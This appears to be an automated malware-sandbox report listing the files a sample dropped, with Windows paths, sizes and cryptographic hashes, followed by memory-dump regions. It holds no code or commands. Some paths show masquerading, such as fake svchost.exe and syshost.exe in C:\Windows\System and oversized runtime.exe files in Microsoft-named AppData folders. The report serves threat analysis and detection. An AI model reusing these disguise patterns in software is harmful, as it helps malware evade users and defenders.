MD5
307c3de0d037d004b0bf4d5b98e6de73

SHA1
8d360d8be9ec160e5b1486a04a8bbcdb9a1cf5e5

SHA256
b6ea9124b479b3b7162daf1ebe2b922e7ba38c9524e7ab81a8f4a67ee6e832c9

SHA512
261112a54967e04a8cf4ebce15f799b9bb111313f448497b61e7f45516d3109a675da4b69dc64a6015c92aaafabad62f3cbd1cb419bc458b83829027b4ff8282

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
545889098c116002a5f5a6fd3b2ca82d

SHA1
5934b58a10506935b96761cb8672084d7e09058b

SHA256
0cb1f47d96081753a94d04a319e6e4568458ac49a223cf299f12bed2b204997d

SHA512
599277b9659e1cad987ef79fd9fcfd42e192bda32a76d2efef78bfb35491084dc314f9346e5003bedf00b80dbed926379995af221442c62aa161fc9930b98af0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
eab750b8122789b197d244e027c549c2

SHA1
379d4127d136a872f1c9310a15ee740f062715fa

SHA256
8bc3cf5779a81eb4ee52b20c70b8eb0f09c1af61f6cd28ee1229ee3faf0b85d5

SHA512
31e3741e0efe281b0e7cae3482655646df9200fec5c815ebade5335698de4fd168d335edf4093fed367df0090d28cc4f072a54b0c8f98ea2b5d29564b794d903

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7b1584c728abf265f7c94f6556fdf8a1

SHA1
ef377330102493c3560cbb6dc6f5cb332f3b3703

SHA256
2ada183b8006cf7bccb3885eee5eb5ee8c06c1e154894e54da7e76324bb772a9

SHA512
b6a600e7c72d64c14ec06904e42c7ca58d6f078eec825e6ef2664f3aa85471c573d82f3e51ffa142936c5d7b1196024b8944eb70e335e2dc66ff612dc58fb1a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
5348a6f2788430afb6c6f9e19c63bef6

SHA1
736d8b1fa028c560607863d6f5693e65a9133ba6

SHA256
2bb5b8372c2d86ab4f47005894ba560efd8986af0302d42fa53a7ccda4018f1d

SHA512
3671801b914739a1c90e4009bdac474f8280f3133de83c4f1cd31014eb36dd34a39285ab7eb5d6be6e8783224fd6a61bb1c88c7e494d027451a045e733d506a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
Filesize
379.0MB

MD5
592847022767d751805570da5198a580

SHA1
150aa95ac4c30b2410fb9a4539f1c62295593a13

SHA256
5d9c817ebe22cadead54bda8c960869d7bb56426b0ee9efdfca1dc796d5a515a

SHA512
d5e2257f801b482d5f78f173164881b7fda2f1c9bf757752b1d8897fe12e8c844cfd0ead1af6eb171e3fc0390cbff0de0bb3f4af427d553b0e29bf03cd1b1ed7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
Filesize
184.5MB

MD5
909d346e8eaf99a8ba2d69c7cfec3d8f

SHA1
7c1ed91a99999f634e155a6c78a4c91d09fdc7d3

SHA256
1f0f14244e84232e54c77601ae14fc6d9c994e8ac41fb91c3bd4c9cc30dd5faa

SHA512
9fa959111cb2d66665afc1ab17f6396899373fea7fee8742bef1c32645ee3be039df6b41fa0165cb88fcdb4cf5ab076978827754e58bf514aaa920713e42af42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
Filesize
172.2MB

MD5
f8026d7ae8aad38ab5425cf807692fd6

SHA1
c23023bab787ef66a3750ebc4fa0002dcafaf677

SHA256
974267d2415692d5598448cd3d8b9499bb241b6447e5fa84aec92b96a9c95ae4

SHA512
300bc0014aaf71446076e8367ad7712507ec9c6527e51da35e26a0105a3396a99fd125d1aef93e30b286e5d95f27f9c1b7f298460943925189ebaf6282cb5e31

Download Submit
C:\Users\Admin\AppData\Local\Temp\LDnJObCsNV
Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\MRAjWwhTHctcuAx
Filesize
71KB

MD5
a3eb5f22bc8e7f4060e3ff18c4ac70b9

SHA1
8480869a34c9723063dba9cc8279cf4e7c2bc4cd

SHA256
0582ca04b28149ce2fd9732dff5e9894a60454eeb03166ddde677c9224c1f9f6

SHA512
3e88f72ace3e80a18f2986b43d90b9bf33e131ec77ce34c1462605784332e4676af5e8414ee75146bd14ef8a2e60a13ecf097c189206cd010f748e171903c5f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
Filesize
243.9MB

MD5
b6cb92c0b95b757361e4810a2da29e31

SHA1
e92293108db0f9a87f7c3e3456b9dc626c94cb5e

SHA256
23555bce3f05739847107ab8f20a5b3ec22fe65322a5cae4d6403fa7a3272cb5

SHA512
07d5e0af324d4eceec4bef25d39924234781a6c5518f5e17576cb2b6b8becaee11494fd10d6f2d731c0773faccffd9918f1c9aa5cc15c819481b9423eaf0e4a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
Filesize
241.4MB

MD5
f637104cad2e497de2e389b8bfd08bfb

SHA1
9c714ad6f05d0687be908faf042cc395f25f5b85

SHA256
0e9bcd6cff27757b719545fb95c24315574fb4fb25f2ed85960ed2f4a120dedb

SHA512
c0ee282b987980396357355fc6491a692854849c5f0dcd049ed0703b91919db3aa2b7a6c1c96e03006c949b6106fcfd53e66a2f38eb5363f62e91d9494e15449

Download Submit
C:\Users\Admin\AppData\Local\Temp\Pyftpsushffsruhxwfdkstart.exe
Filesize
280KB

MD5
23f26fded7194243117b1e1049db7f38

SHA1
ab89459d07718a805648b13c330d1a19cc736c27

SHA256
38bb71fca724bde72220190ebfe9a14bde8332ed68fea6a30cbb0bb9d11bc46d

SHA512
ac281f152ce3befbf811193e7eb1bea7ec510abb807c3e94a531a73dbb7987fecd4dba3515534414ecb38d0e612226350352b87cddba8a9b58fd9cff96384dd7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Pyftpsushffsruhxwfdkstart.exe
Filesize
280KB

MD5
23f26fded7194243117b1e1049db7f38

SHA1
ab89459d07718a805648b13c330d1a19cc736c27

SHA256
38bb71fca724bde72220190ebfe9a14bde8332ed68fea6a30cbb0bb9d11bc46d

SHA512
ac281f152ce3befbf811193e7eb1bea7ec510abb807c3e94a531a73dbb7987fecd4dba3515534414ecb38d0e612226350352b87cddba8a9b58fd9cff96384dd7

Download Submit
C:\Users\Admin\AppData\Local\Temp\SjFbcXoEFfRsWxP
Filesize
71KB

MD5
a3eb5f22bc8e7f4060e3ff18c4ac70b9

SHA1
8480869a34c9723063dba9cc8279cf4e7c2bc4cd

SHA256
0582ca04b28149ce2fd9732dff5e9894a60454eeb03166ddde677c9224c1f9f6

SHA512
3e88f72ace3e80a18f2986b43d90b9bf33e131ec77ce34c1462605784332e4676af5e8414ee75146bd14ef8a2e60a13ecf097c189206cd010f748e171903c5f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\XVlBzgbaiC
Filesize
148KB

MD5
90a1d4b55edf36fa8b4cc6974ed7d4c4

SHA1
aba1b8d0e05421e7df5982899f626211c3c4b5c1

SHA256
7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c

SHA512
ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\YzRyWJjPjz
Filesize
92KB

MD5
7b8fce002a4226440336bb820df16ce0

SHA1
2c01f79baedc0d595a7b614dd3e8856059a073c1

SHA256
38631485d25760a44d157bde164d0bd5785d37f183c62715960170df1f6a4066

SHA512
ac46dcefa71a43e059834963fc7bc8e58079d7eea69daf5f5ba8630fe07f0a10da9091126e91ea43d828a733039650dac17fb29398f1ab0adf70769093956ff3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aamumu0s.plz.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\bZRjxAwnwe
Filesize
71KB

MD5
a3eb5f22bc8e7f4060e3ff18c4ac70b9

SHA1
8480869a34c9723063dba9cc8279cf4e7c2bc4cd

SHA256
0582ca04b28149ce2fd9732dff5e9894a60454eeb03166ddde677c9224c1f9f6

SHA512
3e88f72ace3e80a18f2986b43d90b9bf33e131ec77ce34c1462605784332e4676af5e8414ee75146bd14ef8a2e60a13ecf097c189206cd010f748e171903c5f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\bZRjxAwnwe
Filesize
71KB

MD5
a3eb5f22bc8e7f4060e3ff18c4ac70b9

SHA1
8480869a34c9723063dba9cc8279cf4e7c2bc4cd

SHA256
0582ca04b28149ce2fd9732dff5e9894a60454eeb03166ddde677c9224c1f9f6

SHA512
3e88f72ace3e80a18f2986b43d90b9bf33e131ec77ce34c1462605784332e4676af5e8414ee75146bd14ef8a2e60a13ecf097c189206cd010f748e171903c5f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\hxKQFDaFpL
Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\lgTeMaPEZQleQYh
Filesize
71KB

MD5
a3eb5f22bc8e7f4060e3ff18c4ac70b9

SHA1
8480869a34c9723063dba9cc8279cf4e7c2bc4cd

SHA256
0582ca04b28149ce2fd9732dff5e9894a60454eeb03166ddde677c9224c1f9f6

SHA512
3e88f72ace3e80a18f2986b43d90b9bf33e131ec77ce34c1462605784332e4676af5e8414ee75146bd14ef8a2e60a13ecf097c189206cd010f748e171903c5f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\pfRFEgmotaFetHs
Filesize
71KB

MD5
a3eb5f22bc8e7f4060e3ff18c4ac70b9

SHA1
8480869a34c9723063dba9cc8279cf4e7c2bc4cd

SHA256
0582ca04b28149ce2fd9732dff5e9894a60454eeb03166ddde677c9224c1f9f6

SHA512
3e88f72ace3e80a18f2986b43d90b9bf33e131ec77ce34c1462605784332e4676af5e8414ee75146bd14ef8a2e60a13ecf097c189206cd010f748e171903c5f0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
Filesize
255.4MB

MD5
a5dff286ea229d4f56e00a1d9b82c17c

SHA1
4c3642327b057d1724636eb8fcb3ba7d651e8654

SHA256
e84ad0f5bcdabe663813a55eea6068932c98078b8c806398dfb5e95003345aed

SHA512
b398c3f5afb8b6608f7bf90c71e1ed74611d69a2db42de0f41fd736e40582871932ab4a2f883b16f44a98ab47de9ece90eb101d146adfa5eb506854923099501

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
Filesize
245.9MB

MD5
e9123cbc28b07a9d353425ec4f29d837

SHA1
6dab3fdaff6117f76c2c226419b58e3ebd679a4d

SHA256
646e9ec41795ab1fe8e96d90523f5df11be99d744bfefdae839c0e650c2e0e46

SHA512
1ebdc57323156b1ff35d3d7c6c52497ecc588adf374ac653b199a250bcfac7054080e3eef664f8d85b12edd88040a9dd0ce5eacf409c57c3977f0587a60cdbad

Download Submit
C:\Windows\System\calc.exe
Filesize
27KB

MD5
5da8c98136d98dfec4716edd79c7145f

SHA1
ed13af4a0a754b8daee4929134d2ff15ebe053cd

SHA256
58189cbd4e6dc0c7d8e66b6a6f75652fc9f4afc7ce0eba7d67d8c3feb0d5381f

SHA512
6e2b067760ec178cdcc4df04c541ce6940fc2a0cdd36f57f4d6332e38119dbc5e24eb67c11d2c8c8ffeed43533c2dd8b642d2c7c997c392928091b5ccce7582a

Download Submit
C:\Windows\System\svchost.exe
Filesize
5.4MB

MD5
0cb1e47546d778ad888baee0f6c9b5ec

SHA1
164220f9706f898d33dd76435c0603ea8972d2b3

SHA256
c1853b7f39c854c19408c29f02fb13b883edcde8d61bd261cb8be0d2c8621dbe

SHA512
f372c052b8b61ecf7036ef6ec1d067d104ed5cf451c6d08ee2cad39ca57c6b21ce6c109cb3103c0a5631ddc55ea367db1687c0e5ad1e816f5e8b4fa725da99ff

Download Submit
C:\Windows\System\svchost.exe
Filesize
5.4MB

MD5
0cb1e47546d778ad888baee0f6c9b5ec

SHA1
164220f9706f898d33dd76435c0603ea8972d2b3

SHA256
c1853b7f39c854c19408c29f02fb13b883edcde8d61bd261cb8be0d2c8621dbe

SHA512
f372c052b8b61ecf7036ef6ec1d067d104ed5cf451c6d08ee2cad39ca57c6b21ce6c109cb3103c0a5631ddc55ea367db1687c0e5ad1e816f5e8b4fa725da99ff

Download Submit
C:\Windows\System\syshost.exe
Filesize
3.1MB

MD5
138eefb81e72bbdf6bf009876f445c28

SHA1
14afd4156ca94a340e04547809088e6d5d51bc92

SHA256
53274ab4f9cebd26058061cd944614586a086d91cd9f36b679e3c8dccae84a7d

SHA512
cfd999a6f891f43e0302c013a7e22987c1ca2bdbf7ddb7e9e436703f13ce21acbf431e0acc4aa0be7969c6664306679a0d8243562f26b23bcadc76080a8e6ba5

Download Submit
C:\Windows\System\syshost.exe
Filesize
3.1MB

MD5
138eefb81e72bbdf6bf009876f445c28

SHA1
14afd4156ca94a340e04547809088e6d5d51bc92

SHA256
53274ab4f9cebd26058061cd944614586a086d91cd9f36b679e3c8dccae84a7d

SHA512
cfd999a6f891f43e0302c013a7e22987c1ca2bdbf7ddb7e9e436703f13ce21acbf431e0acc4aa0be7969c6664306679a0d8243562f26b23bcadc76080a8e6ba5

Download Submit
\??\PIPE\wkssvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1168-607-0x000002334EAF0000-0x000002334EB00000-memory.dmp

Filesize
64KB

Download
memory/1168-608-0x000002334EAF0000-0x000002334EB00000-memory.dmp

Filesize
64KB

Download
memory/1348-463-0x000001649BD60000-0x000001649BD70000-memory.dmp

Filesize
64KB

Download
memory/1348-464-0x000001649BD60000-0x000001649BD70000-memory.dmp

Filesize
64KB

Download
memory/1352-337-0x00000130EDB90000-0x00000130EDBA0000-memory.dmp

Filesize
64KB

Download
memory/1352-334-0x00000130EDB90000-0x00000130EDBA0000-memory.dmp

Filesize
64KB

Download
memory/1900-310-0x000002C1A5340000-0x000002C1A5350000-memory.dmp

Filesize
64KB

Download
memory/1900-311-0x000002C1A5340000-0x000002C1A5350000-memory.dmp

Filesize
64KB

Download
memory/2104-129-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/2112-577-0x000001F3BF7A0000-0x000001F3BF7B0000-memory.dmp

Filesize
64KB

Download
memory/2196-552-0x000001F405040000-0x000001F405050000-memory.dmp

Filesize
64KB

Download
memory/2272-492-0x0000019BF0770000-0x0000019BF0780000-memory.dmp

Filesize
64KB

Download
memory/2272-493-0x0000019BF0770000-0x0000019BF0780000-memory.dmp

Filesize
64KB

Download
memory/3800-527-0x00000173B2570000-0x00000173B2580000-memory.dmp

Filesize
64KB

Download
memory/3800-525-0x00000173B2570000-0x00000173B2580000-memory.dmp

Filesize
64KB

Download
memory/3928-165-0x00000235FB5C0000-0x00000235FB5D0000-memory.dmp

Filesize
64KB

Download
memory/3928-239-0x00000235FB5C0000-0x00000235FB5D0000-memory.dmp

Filesize
64KB

Download
memory/3928-142-0x00000235FC6D0000-0x00000235FC746000-memory.dmp

Filesize
472KB

Download
memory/3928-154-0x00000235FC650000-0x00000235FC69C000-memory.dmp

Filesize
304KB

Download
memory/3928-242-0x00000235FB5C0000-0x00000235FB5D0000-memory.dmp

Filesize
64KB

Download
memory/3928-136-0x00000235FBA80000-0x00000235FBAA2000-memory.dmp

Filesize
136KB

Download
memory/3928-188-0x00000235FB5C0000-0x00000235FB5D0000-memory.dmp

Filesize
64KB

Download
memory/3928-164-0x00000235FB5C0000-0x00000235FB5D0000-memory.dmp

Filesize
64KB

Download
memory/3928-241-0x00000235FB5C0000-0x00000235FB5D0000-memory.dmp

Filesize
64KB

Download
memory/3928-240-0x00000235FB5C0000-0x00000235FB5D0000-memory.dmp

Filesize
64KB

Download
memory/3928-222-0x00000235FB5C0000-0x00000235FB5D0000-memory.dmp

Filesize
64KB

Download
memory/4140-355-0x000001761C070000-0x000001761C080000-memory.dmp

Filesize
64KB

Download
memory/4220-117-0x0000000005AE0000-0x0000000005C32000-memory.dmp

Filesize
1.3MB

Download
memory/4220-122-0x00000000059D0000-0x00000000059E0000-memory.dmp

Filesize
64KB

Download
memory/4220-121-0x0000000005E20000-0x0000000006170000-memory.dmp

Filesize
3.3MB

Download
memory/4220-120-0x0000000005DF0000-0x0000000005E12000-memory.dmp

Filesize
136KB

Download
memory/4220-119-0x0000000005D30000-0x0000000005DC2000-memory.dmp

Filesize
584KB

Download
memory/4220-116-0x0000000000F70000-0x0000000001164000-memory.dmp

Filesize
2.0MB

Download
memory/4220-118-0x0000000005980000-0x00000000059B0000-memory.dmp

Filesize
192KB

Download
memory/4752-425-0x00000182C5670000-0x00000182C5680000-memory.dmp

Filesize
64KB

Download
memory/4752-424-0x00000182C5670000-0x00000182C5680000-memory.dmp

Filesize
64KB

Download
memory/4900-213-0x0000000008E80000-0x0000000008E92000-memory.dmp

Filesize
72KB

Download
memory/4900-179-0x0000000008480000-0x00000000084CB000-memory.dmp

Filesize
300KB

Download
memory/4900-141-0x0000000000DB0000-0x0000000000DE6000-memory.dmp

Filesize
216KB

Download
memory/4900-163-0x0000000007190000-0x00000000071F6000-memory.dmp

Filesize
408KB

Download
memory/4900-166-0x0000000007B20000-0x0000000007B86000-memory.dmp

Filesize
408KB

Download
memory/4900-168-0x0000000000D30000-0x0000000000D40000-memory.dmp

Filesize
64KB

Download
memory/4900-167-0x0000000000D30000-0x0000000000D40000-memory.dmp

Filesize
64KB

Download
memory/4900-231-0x0000000009140000-0x000000000915A000-memory.dmp

Filesize
104KB

Download
memory/4900-170-0x0000000007B90000-0x0000000007EE0000-memory.dmp

Filesize
3.3MB

Download
memory/4900-177-0x0000000007280000-0x000000000729C000-memory.dmp

Filesize
112KB

Download
memory/4900-151-0x00000000072A0000-0x00000000078C8000-memory.dmp

Filesize
6.2MB

Download
memory/4900-193-0x00000000081B0000-0x0000000008226000-memory.dmp

Filesize
472KB

Download
memory/4900-230-0x0000000009B80000-0x000000000A1F8000-memory.dmp

Filesize
6.5MB

Download
memory/5008-128-0x0000000000870000-0x00000000008BC000-memory.dmp

Filesize
304KB

Download